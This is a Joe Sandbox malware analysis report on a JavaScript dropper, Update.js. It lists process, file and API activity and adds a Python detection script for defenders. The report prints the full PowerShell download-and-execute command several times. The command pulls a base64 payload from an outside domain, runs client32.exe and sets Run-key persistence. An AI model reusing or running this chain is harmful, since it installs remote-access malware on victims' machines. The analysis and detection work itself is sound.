Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL
Source: C:\Windows\System32\wscript.exe | COM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
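The PowerShell one-liner that wscript.exe spawns is the entire delivery chain in one command line: fetch a base64 blob over HTTPS with WebClient.DownloadString, decode it with FromBase64String, write it as a zip under %APPDATA% in a directory named XOQEKRYWQK plus a random integer (Get-Random -Minimum -5 -Maximum 12 yields -5 to 11, which is why this run produced XOQEKRYWQK-5), extract it, start client32.exe, mark the directory Hidden, and add an HKCU Run value named CJYJHX. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It runs simple process-creation detection logic over two constructed records, one copied from the command line above and one benign admin one-liner, and resolves the script's `$var='literal'` assignments to pull the indicators (URL, Run key and value name, drop-directory prefix, dropped executable) out of the command line. The record field names and the indicator labels are assumptions of this example.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation records, shaped like what Sysmon Event ID 1 or a 4688
# event with command-line auditing would provide. The first copies the wscript.exe ->
# powershell.exe command line from the report; the second is a benign admin one-liner
# that must not fire. Field names are an assumption of this example.
SAMPLE_EVENTS = [
    {
        "parent": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": (
            r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C '
            r"$BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';"
            r"$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);"
            r"$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);"
            r"$asd = Get-Random -Minimum -5 -Maximum 12; "
            r"$UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;"
            r"if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };"
            r"$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);"
            r"try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};"
            r"$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};"
            r"$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';"
            r"$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';"
            r"New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;"
        ),
    },
    {
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'"powershell.exe" -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    },
]

# Indicator labels are this example's own, not Joe Sandbox or Sigma rule names.
# PowerShell accepts any unambiguous parameter prefix, hence -e[a-z]* and -nop[a-z]*.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-e[a-z]*\s+bypass", re.I),
    "no_profile": re.compile(r"-nop[a-z]*\b", re.I),
    "download_string": re.compile(r"\.DownloadString\(", re.I),
    "base64_decode": re.compile(r"FromBase64String\(", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run\b", re.I),
    "hidden_attribute": re.compile(r"attributes\s*=\s*'Hidden'", re.I),
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

URL_RE = re.compile(r"""https?://[^\s'"]+""", re.I)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")  # $var='literal'
APPDATA_DIR_RE = re.compile(r"GetFolderPath\('ApplicationData'\)\+'\\([^']+)'", re.I)
JOIN_EXE_RE = re.compile(r"Join-Path\s+\$\w+\s+'([^']+\.exe)'", re.I)


@dataclass
class Verdict:
    suspicious: bool
    hits: list = field(default_factory=list)
    iocs: dict = field(default_factory=dict)


def resolve(token, assignments):
    """Turn a '$var' or a single-quoted literal into its string value (None if unknown)."""
    if token.startswith("$"):
        return assignments.get(token[1:])
    return token.strip("'")


def cmdlet_arg(cmd, cmdlet, flag, assignments):
    """Value passed to `flag` in the first `cmdlet` call, with simple $vars resolved."""
    pattern = rf"{re.escape(cmdlet)}\b[^;]*?{re.escape(flag)}\s+(\$\w+|'[^']*')"
    m = re.search(pattern, cmd, re.I)
    return resolve(m.group(1), assignments) if m else None


def analyse_event(ev):
    cmd = ev["cmdline"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if ev["parent"].lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
        hits.append("script_host_parent")

    assignments = dict(ASSIGN_RE.findall(cmd))
    appdata = APPDATA_DIR_RE.search(cmd)
    exe = JOIN_EXE_RE.search(cmd)
    iocs = {
        "urls": URL_RE.findall(cmd),
        "run_key": cmdlet_arg(cmd, "New-ItemProperty", "-Path", assignments),
        "run_value_name": cmdlet_arg(cmd, "New-ItemProperty", "-Name", assignments),
        "appdata_dir_prefix": appdata.group(1) if appdata else None,
        "dropped_exe": exe.group(1) if exe else None,
    }
    # Any one of these pairings is enough; a lone -NoProfile is normal admin usage.
    hs = set(hits)
    suspicious = (
        {"script_host_parent", "exec_policy_bypass"} <= hs
        or {"download_string", "base64_decode"} <= hs
        or {"run_key_persistence", "hidden_attribute"} <= hs
    )
    return Verdict(suspicious, hits, iocs)


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        v = analyse_event(ev)
        print(f"{'ALERT' if v.suspicious else 'ok   '} hits={v.hits} iocs={v.iocs}")
```

Because the directory suffix is random, a hunt across the fleet should match on the prefix (`%APPDATA%\XOQEKRYWQK*`) rather than on the `-5` seen in this run, and on the Run value name CJYJHX, which the script hard-codes.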
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11113190 GetKeyState,DeviceIoControl,keybd_event
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD33FD3B2D
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11073680
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11029BB0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_110627B0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_110336D0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11051800
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1115F840
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1102BD40
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1101BCD0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11087F50
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11045E70
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1101C110
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_111640E0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11168345
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_111265B0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11070430
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11080740
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1100892B
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1101CF30
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1116EE8B
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_6F9FA980
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_6FA23DB8
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_6F9FDBA0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_6FA23923
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_6FA24910
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_6FA1D70F
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_6F9F1760
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_110627B0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1108B2A0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11073680
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_110336D0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11051800
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1115F840
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11029BB0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1102BD40
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1101BCD0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11087F50
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11045E70
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1101C110
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_111640E0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11168345
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11080740
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1100892B
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1111C990
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1105C8A0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11116F30
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1101CF30
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 6FA19480 appears 33 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 11164ED0 appears 64 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 110B7EF0 appears 35 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 1105E820 appears 628 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 1105E950 appears 59 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 6FA07A90 appears 36 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 111744C6 appears 38 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 6F9F6F50 appears 112 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 11029A70 appears 2053 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 11161299 appears 88 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 11027F40 appears 94 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 11147060 appears 1202 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 6F9F30A0 appears 37 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 6FA07D00 appears 81 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 11147AD0 appears 47 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 11081E70 appears 90 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 1109DCE0 appears 32 times
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: String function: 1116FED0 appears 71 times
Source: Update.js | Initial sample: Strings found which are bigger than 50
Source: amsi64_2324.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: sslproxydump.pcap, type: PCAP | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.rans.troj.expl.evad.winJS@9/27@3/5
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1105A760 GetLastError,FormatMessageA,LocalFree
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1109D8F0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1109D8F0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11089430 FindResourceA,LoadResource,LockResource
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1616:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0olerwg.b0i.ps1
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
